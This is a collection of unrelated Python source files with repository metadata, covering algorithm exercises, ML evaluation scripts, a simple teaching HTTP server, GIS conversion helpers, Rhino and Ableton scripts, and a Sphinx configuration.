2021-08-09T04:29:40
118,053,509
2
1
null
2021-09-20T19:54:02
2018-01-19T00:06:04
Python
UTF-8
Python
false
false
259
py
#!/usr/bin/python # _*_ coding = UTF-8 _*_ def gcdRecur(a, b): ''' a, b: positive integers returns: a positive integer, the greatest common divisor of a & b. ''' if b == 0: return a else: return gcdRecur(b, a % b)
055aabb9ef9a32291d0e6edb97d8a581f7df3962
2509936d814fb6cdd283c2549c518c8dfad9450c
/api/staticdata/regimes/migrations/0010_merge_20221214_1035.py
81daedc733cfa1f2e70025a26480bb78e0acf8fd
[ "MIT" ]
permissive
uktrade/lite-api
19f829119fa96de3f4862eb233845508b0fef7eb
b35792fc981220285ed9a7b3659aba460f1b207a
refs/heads/dev
2023-08-25T10:11:17.594001
2023-08-24T14:24:43
2023-08-24T14:24:43
172,914,199
4
3
MIT
2023-09-14T17:36:47
2019-02-27T12:46:22
Python
UTF-8
Python
false
false
277
py
# Generated by Django 3.2.16 on 2022-12-14 10:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ("regimes", "0009_update_cwc_shortened_names"), ("regimes", "0009_update_nsg_regimes"), ] operations = []
8158442771c431dd35672a9edc586edd0fe33d1d
e23a4f57ce5474d468258e5e63b9e23fb6011188
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/leetCode/BreadthFirstSearch/103_BinaryTreeZigzagLevelOrderTraversal.py
4445a0088162de197a6843a1be5b63a07388215c
[]
no_license
syurskyi/Python_Topics
52851ecce000cb751a3b986408efe32f0b4c0835
be331826b490b73f0a176e6abed86ef68ff2dd2b
refs/heads/master
2023-06-08T19:29:16.214395
2023-05-29T17:09:11
2023-05-29T17:09:11
220,583,118
3
2
null
2023-02-16T03:08:10
2019-11-09T02:58:47
Python
UTF-8
Python
false
false
797
py
#! /usr/bin/env python # -*- coding: utf-8 -*- # Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None c.. Solution o.. ___ zigzagLevelOrder root __ n.. root: r_ [] left2right = 1 # 1. scan the level from left to right. -1 reverse. ans, stack, temp # list, [root], [] _____ stack: temp = [node.val ___ node __ stack] stack = [child ___ node __ stack ___ child __ (node.left, node.right) __ child] ans += [temp[::left2right]] # Pythonic way left2right *= -1 r_ ans """ [] [1] [1,2,3] [0,1,2,3,4,5,6,null,null,7,null,8,9,null,10] """
351ef3112a8105eea8a02b98a6ff6303a19eee43
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
/tests/artificial/transf_Integration/trend_LinearTrend/cycle_30/ar_/test_artificial_128_Integration_LinearTrend_30__100.py
7a5e907e035774475c35332c1022bd9fc95546df
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
jmabry/pyaf
797acdd585842474ff4ae1d9db5606877252d9b8
afbc15a851a2445a7824bf255af612dc429265af
refs/heads/master
2020-03-20T02:14:12.597970
2018-12-17T22:08:11
2018-12-17T22:08:11
137,104,552
0
0
BSD-3-Clause
2018-12-17T22:08:12
2018-06-12T17:15:43
Python
UTF-8
Python
false
false
275
py
import pyaf.Bench.TS_datasets as tsds import pyaf.tests.artificial.process_artificial_dataset as art art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 30, transform = "Integration", sigma = 0.0, exog_count = 100, ar_order = 0);
42f0deaf250627b10751156d712d786cdc96ee26
6bf1b595a7f4d3cbf0995455869d438a7d0e0624
/lingvo/tasks/milan/score_functions.py
9c4ce867b372dfed657bec15a96096952923b006
[ "Apache-2.0" ]
permissive
huaxz1986/lingvo
889abc82b1bab6f37ba861c41eb480b7e89362c0
b83984577610423e3b1c6b04ca248cd23f2842f7
refs/heads/master
2022-05-15T03:29:56.903688
2022-04-02T01:41:25
2022-04-02T01:41:25
173,536,461
1
0
Apache-2.0
2019-03-03T05:52:01
2019-03-03T05:52:01
null
UTF-8
Python
false
false
1,664
py
# Lint as: python3 # Copyright 2021 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Implementation of combination functions for dual-encoder models.""" from lingvo import compat as tf from lingvo.core import base_layer class DotProductScoreFunction(base_layer.BaseLayer): """Performs dot product combination between two encoded vectors.""" @classmethod def Params(cls): p = super().Params() p.name = 'dot_product_score_function' return p def FProp(self, theta, x, y): """Computes pair-wise dot product similarity. Args: theta: NestedMap of variables belonging to this layer and its children. x: batch of encoded representations from modality x. A float32 Tensor of shape [x_batch_size, encoded_dim] y: batch of encoded representations from modality y. A float32 Tensor of shape [y_batch_size, encoded_dim] Returns: Pairwise dot products. A float32 Tensor with shape `[x_batch_size, y_batch_size]`. """ return tf.matmul(x, y, transpose_b=True)
31068cd2c89faea0c9efdff5214f7c0d9abac707
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/otherforms/_suffered.py
f5ba9fb4722605fcd51182e2e5bcc1348faf8603
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
224
py
#calss header class _SUFFERED(): def __init__(self,): self.name = "SUFFERED" self.definitions = suffer self.parents = [] self.childen = [] self.properties = [] self.jsondata = {} self.basic = ['suffer']
231a0e1fcc8967f9072dfe360b036cfcdba74643
c105797a5b6f5aca0b892ccdadbb2697f80fb3ab
/python_base/base7/base7_3.py
7a29be88d6785d292d6f115f65d970948129502d
[]
no_license
jj1165922611/SET_hogwarts
6f987c4672bac88b021069c2f947ab5030c84982
fbc8d7363af0a4ac732d603e2bead51c91b3f1f7
refs/heads/master
2023-01-31T19:41:27.525245
2020-12-15T13:43:45
2020-12-15T13:43:45
258,734,624
0
0
null
null
null
null
UTF-8
Python
false
false
2,144
py
#!/usr/bin/env python # -*- coding:utf-8 -*- # @Time : 2020-07-21 # @Author : Joey Jiang # @File : base7_3.py # @Software : PyCharm # @Description: python控制流语法 # 1.1、分支结构 import random a = 0 if a == 0: print("a=0") else: print("a!=0") # 1.2、多重分支 a = 1 if a == 1: print("a=1") elif a == 2: print("a=2") elif a == 3: print("a==3") else: print("a!=1、2、3") # 1.3、练习 # 分别使用分支嵌套以及多重分支去实现分段函数求值 # 3x - 5 (x>1) # f(x)= x + 2 (-1<=x<=1) # 5x + 3(x<-1) # 1.3.1分支嵌套 x = -2 if x > 1: print(3 * x - 5) else: if x >= -1: print(x + 2) else: print(5 * x + 3) # 1.3.2多重分支 if x > 1: print(3 * x - 5) elif x >= -1: print(x + 2) else: print(5 * x + 3) # 2.1练习 # 计算1~100的和 sum1 = 0 for i in range(1, 101): sum1 = sum1 + i print(sum1) # 2.2练习 # 加入分支结构实现1~100之间偶数的求和 sum2 = 0 for i in range(1, 101): if i % 2 == 0: sum2 = sum2 + i print(sum2) # 2.3练习 # 使用python实现1~100之间偶数求和 sum3 = 0 for i in range(2, 101): if i % 2 == 0: sum3 = sum3 + i print(sum3) # 3、While循环 # 3.1、While Else while_a = 1 while while_a == 1: print("while_a=1") while_a = while_a + 1 else: print("while_a!=1") print(while_a) # 3.2、简单语句组 flag = 10 while flag == 10: flag = flag + 1 else: print(flag) # 4、break语句 for i in range(4): if i == 2: break print("i=", i) # 5、continue语句 for j in range(4): if j == 2: continue print("j=", j) # 6、练习 """ 猜数字游戏,计算机出一个1~100之间的随机数由人来猜, 计算机根据人猜的数字分别给出提示大一点/小一点/猜对了 """ guess_number = random.randint(1, 100) print(guess_number) while True: number = int(input("请输入一个1~100之间的整数>")) if number == guess_number: print("猜对了") break elif number > guess_number: print("大一点") else: print("小一点")
2b6b3d0ed44ecf20e0b302e6ccd0aa6574a753fa
22cbb7cffc3e5cf53fe87d2db216fdb88c8b7a8c
/stems/gis/convert.py
e26ac0443e6bd20f52888999784f13231793fecd
[ "BSD-3-Clause" ]
permissive
ceholden/stems
838eb496978f7b68ae72988e0469c60e8730cb9c
2e219eb76a44d6897881642635103b3353fc5539
refs/heads/master
2022-02-12T21:56:41.939073
2019-08-19T23:09:49
2019-08-19T23:09:49
164,480,487
3
2
null
null
null
null
UTF-8
Python
false
false
5,186
py
""" GIS variable conversion library Functions here are convenient ways of going from various representations of GIS information used in this stack (e.g., WKT) to the following representations: * Coordinate Reference System * :py:class:`rasterio.crs.CRS` * Geotransform * :py:class:`affine.Affine` * Bounding Box * :py:class:`rasterio.coords.BoundingBox` * Bounds * :py:class:`shapely.geom.Polygon` """ from functools import singledispatch import logging from affine import Affine import numpy as np from osgeo import osr from rasterio.coords import BoundingBox from rasterio.crs import CRS from rasterio.errors import CRSError import shapely.geometry from ..utils import (find_subclasses, register_multi_singledispatch) logger = logging.getLogger() LIST_TYPE = (tuple, list, np.ndarray, ) # XARRAY_TYPE = (xr.Dataset, xr.DataArray) GEOM_TYPE = find_subclasses(shapely.geometry.base.BaseGeometry) # ============================================================================ # Affine geotransform @singledispatch def to_transform(value, from_gdal=False): """ Convert input into an :py:class:`affine.Affine` transform Parameters ---------- value : Affine or iterable 6 numbers representing affine transform from_gdal : bool, optional If `value` is a tuple or list, specifies if transform is GDAL variety (True) or rasterio/affine (False) Returns ------- affine.Affine Affine transform """ raise _CANT_CONVERT(value) @to_transform.register(Affine) def _to_transform_affine(value, from_gdal=False): return value @register_multi_singledispatch(to_transform, LIST_TYPE) def _to_transform_iter(value, from_gdal=False): if from_gdal: return Affine.from_gdal(*value[:6]) else: return Affine(*value[:6]) @to_transform.register(str) def _to_transform_str(value, from_gdal=False, sep=','): return _to_transform_iter([float(v) for v in value.split(sep)]) # ============================================================================ # CRS # TODO: Dispatch function for Cartopy @singledispatch def to_crs(value): """ Convert a CRS representation to a :py:class:`rasterio.crs.CRS` Parameters ---------- value : str, int, dict, or osr.SpatialReference Coordinate reference system as WKT, Proj.4 string, EPSG code, rasterio-compatible proj4 attributes in a dict, or OSR definition Returns ------- rasterio.crs.CRS CRS """ raise _CANT_CONVERT(value) @to_crs.register(CRS) def _to_crs_crs(value): return value @to_crs.register(str) def _to_crs_str(value): # After rasterio=1.0.14 WKT is backbone so try it first try: crs_ = CRS.from_wkt(value) crs_.is_valid except CRSError as err: logger.debug('Could not parse CRS as WKT', err) try: crs_ = CRS.from_string(value) crs_.is_valid except CRSError as err: logger.debug('Could not parse CRS as Proj4', err) raise CRSError('Could not interpret CRS input as ' 'either WKT or Proj4') return crs_ @to_crs.register(int) def _to_crs_epsg(value): return CRS.from_epsg(value) @to_crs.register(dict) def _to_crs_dict(value): return CRS(value) @to_crs.register(osr.SpatialReference) def _to_crs_osr(value): return CRS.from_wkt(value.ExportToWkt()) # ============================================================================ # BoundingBox @singledispatch def to_bounds(value): """ Convert input to a :py:class:`rasterio.coords.BoundingBox` Parameters ---------- value : iterable, or Polygon Input containing some geographic information Returns ------- BoundingBox Bounding box (left, bottom, right, top). Also described as (minx, miny, maxx, maxy) """ raise _CANT_CONVERT(value) @to_bounds.register(BoundingBox) def _to_bounds_bounds(value): return value @register_multi_singledispatch(to_bounds, LIST_TYPE) def _to_bounds_iter(value): return BoundingBox(*value) @register_multi_singledispatch(to_bounds, GEOM_TYPE) def _to_bounds_geom(value): return BoundingBox(*value.bounds) # ============================================================================ # Polygon @singledispatch def to_bbox(value): """ Convert input a bounding box :py:class:`shapely.geometry.Polygon` Parameters ---------- value : BoundingBox Object representing a bounding box, or an xarray object with coords we can use to calculate one from Returns ------- shapely.geometry.Polygon BoundingBox as a polygon """ raise _CANT_CONVERT(value) @register_multi_singledispatch(to_bbox, GEOM_TYPE) def _to_bbox_geom(value): return _to_bbox_bounds(BoundingBox(*value.bounds)) @to_bbox.register(BoundingBox) def _to_bbox_bounds(value): return shapely.geometry.box(*value) # ============================================================================ # UTILITIES def _CANT_CONVERT(obj): return TypeError(f"Don't know how to convert this type: {type(obj)}")
7f9a2d07182faa806f9337f02a6a0ce4035514fd
0676f6e4d3510a0305d29aa0b1fe740d538d3b63
/Python/SImplifyPline/CleanUpPolyline.py
1ce7d7116eb272886ed20d4186ae8a3b571c98fb
[ "LicenseRef-scancode-warranty-disclaimer" ]
no_license
pgolay/PG_Scripts
f70ffe7e5ca07acd6f4caedc9a9aec566542da7c
796704a7daa6ac222a40bb02afdb599f74a6b0d4
refs/heads/master
2021-01-19T16:53:41.525879
2017-02-07T18:26:10
2017-02-07T18:26:10
2,730,362
9
1
null
2016-12-30T17:58:08
2011-11-08T00:04:33
Python
UTF-8
Python
false
false
1,898
py
import Rhino import scriptcontext as sc """ Cleans up by collapsing tiny segments in a polyline. """ def CleanUpPolyline(): while True: tol = sc.doc.ModelAbsoluteTolerance if sc.sticky.has_key("PLineSimplifyTol"): tol = sc.sticky["PLineSimplifyTol"] go = Rhino.Input.Custom.GetObject() go.AcceptNumber(True, False) go.GeometryFilter = Rhino.DocObjects.ObjectType.Curve opDblTol = Rhino.Input.Custom.OptionDouble(tol) go.AddOptionDouble("SegmentTolerance",opDblTol) result = go.Get() if( go.CommandResult() != Rhino.Commands.Result.Success ): return if result == Rhino.Input.GetResult.Object: if type(go.Object(0).Geometry()) == Rhino.Geometry.PolylineCurve: curve = go.Object(0).Geometry() rc, pLine = curve.TryGetPolyline() pLineId = go.Object(0).ObjectId else: sc.doc.Objects.UnselectAll() sc.doc.Views.Redraw() print "Sorry, that was not a polyline." continue break elif result == Rhino.Input.GetResult.Option: tol = opDblTol.CurrentValue sc.sticky["PLineSimplifyTol"] = tol continue elif result == Rhino.Input.GetResult.Number: tol = go.Number() sc.sticky["PLineSimplifyTol"] = tol continue break count = pLine.CollapseShortSegments(tol) if count !=0: sc.doc.Objects.Replace(pLineId, pLine) sc.doc.Views.Redraw() print str(count) + " short segments were collapsed." else: print "No short segments were collapsed." pass if __name__ == "__main__": CleanUpPolyline()
a33b2f9f3cd62ddd7189114556f08b0144aad7c6
b08d42933ac06045905d7c005ca9c114ed3aecc0
/src/coefSubset/evaluate/ranks/tenth/rank_2p49_Q.py
c80b9b7c96acce81b347d895d8286c78c576e7d8
[]
no_license
TanemuraKiyoto/PPI-native-detection-via-LR
d148d53f5eb60a4dda5318b371a3048e3f662725
897e7188b0da94e87126a4acc0c9a6ff44a64574
refs/heads/master
2022-12-05T11:59:01.014309
2020-08-10T00:41:17
2020-08-10T00:41:17
225,272,083
1
0
null
null
null
null
UTF-8
Python
false
false
3,204
py
# 9 July 2019 # Kiyoto Aramis Tanemura # Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script. # Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool. # Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue. import os import pandas as pd import numpy as np import pickle os.chdir('/mnt/scratch/tanemur1/') # Read the model and trainFile testFile = '2p49.csv' identifier = 'Q' thresholdCoef = 0.1 testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/' modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/tenth/' outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/tenth/ranks/' pdbID = testFile[:4] with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f: clf = pickle.load(f) result = pd.DataFrame() scoreList = [] df1 = pd.read_csv(testFilePath + testFile) dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref'] df1 = df1.drop(dropList, axis = 1) df1 = df1.set_index('Pair_name') df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns) df1.fillna(0.0, inplace = True) df1 = df1.reindex(sorted(df1.columns), axis = 1) # Drop features with coefficients below threshold coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients']) coefs = coefs[np.abs(coefs['coefficients']) < thresholdCoef] dropList = list(coefs.index) del coefs df1.drop(dropList, axis = 1, inplace = True) with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g: scaler = pickle.load(g) for i in range(len(df1)): # subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed. df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns) df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0) # Standardize inut DF using the standard scaler used for training data. df2 = scaler.transform(df2) # Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex predictions = clf.predict(df2) score = sum(predictions) scoreList.append(score) # Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False) result['rank'] = range(1, len(result) + 1) with open(outputPath + pdbID + identifier + '.csv', 'w') as h: result.to_csv(h)
6e1066a32d3b678c93a683c91c32ca9925549774
72d010d00355fc977a291c29eb18aeb385b8a9b0
/MPK261/__init__.py
1878e1129184af07da8510e9e370e01adae46916
[]
no_license
maratbakirov/AbletonLive10_MIDIRemoteScripts
bf0749c5c4cce8e83b23f14f671e52752702539d
ed1174d9959b20ed05fb099f0461bbc006bfbb79
refs/heads/master
2021-06-16T19:58:34.038163
2021-05-09T11:46:46
2021-05-09T11:46:46
203,174,328
0
0
null
2019-08-19T13:04:23
2019-08-19T13:04:22
null
UTF-8
Python
false
false
741
py
# Embedded file name: /Users/versonator/Jenkins/live/output/mac_64_static/Release/python-bundle/MIDI Remote Scripts/MPK261/__init__.py # Compiled at: 2018-04-23 20:27:04 from __future__ import absolute_import, print_function, unicode_literals from .MPK261 import MPK261 from _Framework.Capabilities import controller_id, inport, outport, CONTROLLER_ID_KEY, PORTS_KEY, NOTES_CC, SCRIPT, REMOTE def get_capabilities(): return {CONTROLLER_ID_KEY: controller_id(vendor_id=2536, product_ids=[ 37], model_name='MPK261'), PORTS_KEY: [ inport(props=[NOTES_CC, SCRIPT, REMOTE]), outport(props=[SCRIPT, REMOTE])]} def create_instance(c_instance): return MPK261(c_instance)
579153317b369ad77af1c66c5cb43036e863cc19
5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa
/xiaojian/second_phase/day12/http_sever2.0.py
12ccde8198046391e24f9698efd843eacb0c011c
[]
no_license
Wellsjian/20180826
424b65f828f0174e4d568131da01dafc2a36050a
0156ad4db891a2c4b06711748d2624080578620c
refs/heads/master
2021-06-18T12:16:08.466177
2019-09-01T10:06:44
2019-09-01T10:06:44
204,462,572
0
1
null
2021-04-20T18:26:03
2019-08-26T11:38:09
JavaScript
UTF-8
Python
false
false
3,467
py
""" HTTP 2.0 接口设计: 1.提供句柄,通过句柄调用属性和方法 obj = open() lock = Lock() 2.实例化对象,通过对象设置,启动服务 t = Thread() p = Process() 3.根据功能需求,无法帮助用户决定的内容,通过参数传递 4.能够解决的问题,不要让用户去解决,需要用户解决的问题可以用重写的方法去解决 技术分析: HTTP 协议 思路分析 1.使用类进行封装 2.从用户的角度决定代码的编写 """ # 具体HTTP sever功能. from socket import * from select import * class HTTPSever: def __init__(self, host, port, dir): self.addrss = (host, port) self.host = host self.port = port self.dir = dir self.rlist = [] self.wlist = [] self.xlist = [] self.create_socket() self.bind() # 创建套接字 def create_socket(self): self.sockfd = socket() self.sockfd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # 绑定地址 def bind(self): self.sockfd.bind(self.addrss) # 启动服务 def server_forver(self): self.sockfd.listen(5) print("listen the port %d" % self.port) self.rlist.append(self.sockfd) while True: rs, ws, xs = select(self.rlist, self.wlist, self.xlist) self.do_rlist(rs) # 具体处理请求 def handle(self, connfd): request = connfd.recv(1024) if not request: connfd.close() self.rlist.remove(connfd) return # 提取请求内容 request_line = request.splitlines()[0] info = request_line.decode().split(" ")[1] print(connfd.getpeername(), ":", info) if info == "/" or info[-5:] == ".html": self.get_html(connfd, info) else: self.get_data(connfd,info) def get_data(self,connfd,info): response = "HTTP/1.1 200 ok\r\n" response += "\r\n" response += "<h1>Waiting for the HTTPSEVER 3.0<h1>" connfd.send(response.encode()) def get_html(self,connfd,info): if info == "/": html_name = self.dir + "/index.html" else: html_name = self.dir + info try: obj = open(html_name) except Exception: response = "HTTP/1.1 404 not found\r\n" response += "Content_Type:text/html\r\n" response += "\r\n" response += "<h1>sorry.....<h1>" else: response = "HTTP/1.1 200 OK\r\n" response += "Content_Type:text/html\r\n" response += "\r\n" response += obj.read() finally: connfd.send(response.encode()) # 具体处理rlist里的监控信号 def do_rlist(self, rs): for r in rs: if r is self.sockfd: connfd, addr = self.sockfd.accept() print("Connect from ", addr) self.rlist.append(connfd) else: self.handle(r) if __name__ == "__main__": # 希望通过HTTPSever类快速搭建http服务,用以展示自己的网页 # HOST = "0.0.0.0" # PORT = 22222 # ADDR = (HOST, PORT) # DIR = "./static" HOST = "172.40.74.151" PORT = 8888 DIR ="./hfklswn" # 实例化对象 httpfd = HTTPSever(HOST, PORT, DIR) # 启动HTTP服务 httpfd.server_forver()
4d75a2fa3fbfcd227da641b06f2ce1f1a779e02e
6a07912090214567f77e9cd941fb92f1f3137ae6
/cs212/Unit 4/28.py
ae381957925468dc57906a2813b0cfd324dea8d0
[]
no_license
rrampage/udacity-code
4ab042b591fa3e9adab0183d669a8df80265ed81
bbe968cd27da7cc453eada5b2aa29176b0121c13
refs/heads/master
2020-04-18T08:46:00.580903
2012-08-25T08:44:24
2012-08-25T08:44:24
5,352,942
3
0
null
null
null
null
UTF-8
Python
false
false
3,983
py
# cs212 ; Unit 4 ; 28 # ----------------- # User Instructions # # In this problem, you will generalize the bridge problem # by writing a function bridge_problem3, that makes a call # to lowest_cost_search. def bridge_problem3(here): """Find the fastest (least elapsed time) path to the goal in the bridge problem.""" # your code here return lowest_cost_search() # <== your arguments here # your code here if necessary def lowest_cost_search(start, successors, is_goal, action_cost): """Return the lowest cost path, starting from start state, and considering successors(state) => {state:action,...}, that ends in a state for which is_goal(state) is true, where the cost of a path is the sum of action costs, which are given by action_cost(action).""" explored = set() # set of states we have visited frontier = [ [start] ] # ordered list of paths we have blazed while frontier: path = frontier.pop(0) state1 = final_state(path) if is_goal(state1): return path explored.add(state1) pcost = path_cost(path) for (state, action) in successors(state1).items(): if state not in explored: total_cost = pcost + action_cost(action) path2 = path + [(action, total_cost), state] add_to_frontier(frontier, path2) return Fail def final_state(path): return path[-1] def path_cost(path): "The total cost of a path (which is stored in a tuple with the final action)." if len(path) < 3: return 0 else: action, total_cost = path[-2] return total_cost def add_to_frontier(frontier, path): "Add path to frontier, replacing costlier path if there is one." # (This could be done more efficiently.) # Find if there is an old path to the final state of this path. old = None for i,p in enumerate(frontier): if final_state(p) == final_state(path): old = i break if old is not None and path_cost(frontier[old]) < path_cost(path): return # Old path was better; do nothing elif old is not None: del frontier[old] # Old path was worse; delete it ## Now add the new path and re-sort frontier.append(path) frontier.sort(key=path_cost) def bsuccessors2(state): """Return a dict of {state:action} pairs. A state is a (here, there) tuple, where here and there are frozensets of people (indicated by their times) and/or the light.""" here, there = state if 'light' in here: return dict(((here - frozenset([a, b, 'light']), there | frozenset([a, b, 'light'])), (a, b, '->')) for a in here if a is not 'light' for b in here if b is not 'light') else: return dict(((here | frozenset([a, b, 'light']), there - frozenset([a, b, 'light'])), (a, b, '<-')) for a in there if a is not 'light' for b in there if b is not 'light') def bcost(action): "Returns the cost (a number) of an action in the bridge problem." # An action is an (a, b, arrow) tuple; a and b are times; arrow is a string a, b, arrow = action return max(a, b) def test(): here = [1, 2, 5, 10] assert bridge_problem3(here) == [ (frozenset([1, 2, 'light', 10, 5]), frozenset([])), ((2, 1, '->'), 2), (frozenset([10, 5]), frozenset([1, 2, 'light'])), ((2, 2, '<-'), 4), (frozenset(['light', 10, 2, 5]), frozenset([1])), ((5, 10, '->'), 14), (frozenset([2]), frozenset([1, 10, 5, 'light'])), ((1, 1, '<-'), 15), (frozenset([1, 2, 'light']), frozenset([10, 5])), ((2, 1, '->'), 17), (frozenset([]), frozenset([1, 10, 2, 5, 'light']))] return 'test passes' print test()
c37ff8cfcff227220d098069e2f3040dce7f56e8
9145d24e2517d7f3cea6e89158806b95919449b8
/doc/conf.py
37c50aca46644bd4ce262e466fa2696daa55957c
[ "LicenseRef-scancode-warranty-disclaimer", "Apache-2.0" ]
permissive
pombredanne/coveragepy
b6de846694156581ee0b9a3348f4cfd48719855f
2364947d7814a065cf2c05d930eda94203b20f1c
refs/heads/master
2021-01-22T23:43:21.800229
2017-03-18T11:14:13
2017-03-18T11:14:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,618
py
# -*- coding: utf-8 -*- # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0 # For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt # # coverage.py documentation build configuration file, created by # sphinx-quickstart on Wed May 13 22:18:33 2009. # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys, os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.append(os.path.abspath('.')) # on_rtd is whether we are on readthedocs.org on_rtd = os.environ.get('READTHEDOCS', None) == 'True' # -- General configuration ----------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.ifconfig', 'sphinxcontrib.spelling', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master toctree document. master_doc = 'index' # General information about the project. project = u'Coverage.py' copyright = u'2009\N{EN DASH}2017, Ned Batchelder' # CHANGEME # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '4.3.4' # CHANGEME # The full version, including alpha/beta/rc tags. release = '4.3.4' # CHANGEME # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. #html_theme = 'default' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # otherwise, readthedocs.org uses their theme by default, so no need to specify it # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} #html_style = "neds.css" #html_add_permalinks = "" # Add any paths that contain custom themes here, relative to this directory. html_theme_path = ['_templates'] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. html_use_modindex = False # If false, no index is generated. html_use_index = False # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. html_show_sourcelink = False # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '.htm' # Output file base name for HTML help builder. htmlhelp_basename = 'coveragepydoc' # -- Spelling --- spelling_word_list_filename = 'dict.txt' spelling_show_suggestions = False # When auto-doc'ing a class, write the class' docstring and the __init__ docstring # into the class docs. autoclass_content = "class" prerelease = bool(max(release).isalpha()) def setup(app): app.add_stylesheet('coverage.css') app.add_config_value('prerelease', False, 'env') app.info("** Prerelease = %r" % prerelease)
744b2b5f9edcfd6d59f3a65ebfda69a83917795e
